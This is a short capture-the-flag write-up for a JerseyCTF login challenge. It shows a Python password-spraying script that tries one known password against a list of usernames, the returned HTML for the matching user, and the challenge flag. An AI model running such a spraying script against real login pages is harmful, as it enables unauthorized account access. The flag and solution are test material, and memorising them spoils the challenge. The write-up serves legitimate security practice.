I share the Python script that I've used to identify the user with valid
credentials for the given site (http://www.jerseyctf.online) and to obtain the
challenge's flag.

# ***Code***  
```  
import requests

s_target = "http://www.jerseyctf.online"  
b_text = b"Invalid"  
s_given_pwd = 'lightswitchon_and_offLOL26'

def exploit(s_username, s_password):  
params = {'username':s_username,'password':s_password, 'submit':'Login'}  
r = requests.post(s_target,data=params)  
if b_text not in r.content :  
print ("The right user is: ",s_username)  
print (s_username, r.text)  
exit(0)

def main():  
l_users = [w.strip() for w in open("users.txt", "r").readlines()]  
for s_payload in l_users:  
exploit(s_payload, s_given_pwd)

if __name__ == '__main__':  
main()  
```

  
# **Results**  
```  
The right user is: Wolverine

<html lang="en">

<head>  
<meta charset="UTF-8">  
<title>Login</title>  
</head>

<body>  
<h1>Login</h1>  
<form action="" method="post">  
<label>Username  
<input type="text" name="username">  
</label>  
  
  
<label>Password  
<input type="password" name="password">  
</label>  
  
  
<input type="submit" value="Login" name="submit">  
</form>  
Forgot Password?  
<script>  
alert("jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}");  
</script>  
</body>

</html>  
```

# **Flag**

jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}